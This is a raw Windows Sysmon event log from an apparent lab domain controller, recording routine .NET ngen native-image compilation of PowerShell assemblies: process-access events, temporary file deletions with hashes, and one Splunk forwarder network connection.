10341000x800000000000000023007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.824{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6505-00000000CF01}3588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.824{4DB9351A-A277-60D3-6405-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\385CWEFJJ0\Microsoft.PowerShell.Security.ni.dll.auxMD5=73E6C9AA92CF10B777618AEFEA32D433,SHA256=86E9D7910E3CD76FF35B981C59AC1BF7F92944463796B44BBB2810483FEA5F7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.824{4DB9351A-A277-60D3-6405-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\385CWEFJJ0\Microsoft.PowerShell.Security.ni.dllMD5=056CD897A9E676AC25330C601C9130C3,SHA256=DA489ED981502361CF8E51D7905D68387B08A3ED7730E2C7D4FEED6609AF2694,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.793{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29EF7DD7EB39E5E63E55E8D82AE5F8F9,SHA256=64B3BD60E55AF7D00BC1E2B5CACB51A285AE390E013E8270A8896634ADE0879A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.793{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6405-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.777{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6405-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.777{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6405-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.761{4DB9351A-A277-60D3-6305-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T6L2BQ87CZ\Microsoft.PowerShell.ScheduledJob.ni.dll.auxMD5=8DD6780FB8F3D956722B6AA7474A905F,SHA256=39EDBF1AAE69EF85F870884191BFAF5DE0DF2BCA7DCF356F2A1682154F0DA08B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.761{4DB9351A-A277-60D3-6305-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T6L2BQ87CZ\Microsoft.PowerShell.ScheduledJob.ni.dllMD5=A28D95288B980C9446FA2EB4CFF65315,SHA256=C21AE144197B9E908358918F20144264F566029D20FD92AA3054E79ED8142CE2,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000022998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.128{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61459-false10.0.1.12-8000- 10341000x800000000000000022997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.746{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6305-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.730{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6305-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6305-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.714{4DB9351A-A277-60D3-6205-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EI8A977RFJ\Microsoft.PowerShell.Management.Activities.ni.dll.auxMD5=394B3760DF209DACBD475859ED358BF8,SHA256=5CF28297E87F8CB34EE14A5D4B60BB42347A59AF9C64E9265A998AAA5F67FD23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.714{4DB9351A-A277-60D3-6205-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EI8A977RFJ\Microsoft.PowerShell.Management.Activities.ni.dllMD5=0EACA1469FE8B4BCBDDB7E2C9B34FD95,SHA256=FB51202B2C196C19D388612B2E75A4684ACA08861DCD56881C6B1483C8F90A55,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6205-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.605{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6205-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.589{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6205-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.589{4DB9351A-A277-60D3-6105-00000000CF01}6588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DVRSSCQBJT\Microsoft.PowerShell.ISECommon.ni.dll.auxMD5=A95AF2FE24486D94B412730D72053622,SHA256=C5FB9B2775BC22ACE10F4CECB69AD1A89AC30CD5D84F516A643384D51B8AB149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.589{4DB9351A-A277-60D3-6105-00000000CF01}6588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DVRSSCQBJT\Microsoft.PowerShell.ISECommon.ni.dllMD5=EF62095286CA465E5D42A0A4C58D9E46,SHA256=2FD7116A30625B0F7B3C0FC9DB13B443041BB59A456E7BD35BE3B20A753DBAEB,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.574{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6105-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.558{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6105-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.558{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6105-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.558{4DB9351A-A277-60D3-6005-00000000CF01}6592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HUWBO6GXBS\Microsoft.PowerShell.GraphicalHost.ni.dll.auxMD5=76688D8BBBE9E57EB0FD1610172F5145,SHA256=D9B7283B60001C168A7F88ABDA97617B7039F1DADE32D38CB914301B331F9C8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.558{4DB9351A-A277-60D3-6005-00000000CF01}6592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HUWBO6GXBS\Microsoft.PowerShell.GraphicalHost.ni.dllMD5=921B7C8D60F544E4DB3EA99D6433B753,SHA256=E196018F530B323726F03BA978DB5AE31F8D85B62B732BD3E609F4F070BE515E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.496{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6005-00000000CF01}6592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.464{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6005-00000000CF01}6592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.464{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6005-00000000CF01}6592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.464{4DB9351A-A277-60D3-5F05-00000000CF01}5600NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N0NNAAQH0Q\Microsoft.PowerShell.GPowerShell.ni.dll.auxMD5=7B8E7AAA618743BA4B92C993B063829E,SHA256=E5C790E96B8A46A2FDBF67AFE40A6FFDCB3862D54FB9E1AA5133E7C96A13EF57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.464{4DB9351A-A277-60D3-5F05-00000000CF01}5600NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N0NNAAQH0Q\Microsoft.PowerShell.GPowerShell.ni.dllMD5=10480171CDC5941A9E19C14F62D7CEAD,SHA256=C1163A48986D6A9ED39C2AA6240C690B2764459A3D0504FBBADC18426B44643A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 